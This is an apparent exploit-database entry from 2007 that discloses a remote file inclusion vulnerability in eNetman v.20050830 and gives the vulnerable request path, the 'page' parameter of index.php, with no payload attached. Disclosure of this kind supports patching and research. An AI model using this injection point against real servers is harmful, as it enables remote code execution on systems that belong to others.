id: 2107
date: 09/02/2007
title: eNetman v.20050830 (index.php page) Remote File Inclusion Vulnerability
author: JaheeM
cves: 

=======================================================================
eNetman v.20050830 (index.php page) Remote File Inclusion Vulnerability
=======================================================================


Title           : eNetman - The Enchanced Network Manager Remote File Inclusion
URL             : http://freshmeat.net/projects/enetman/
Author          : JaheeM
Exploit         : senetman/html/index.php?page=



#  0day.today [2023-03-25]  #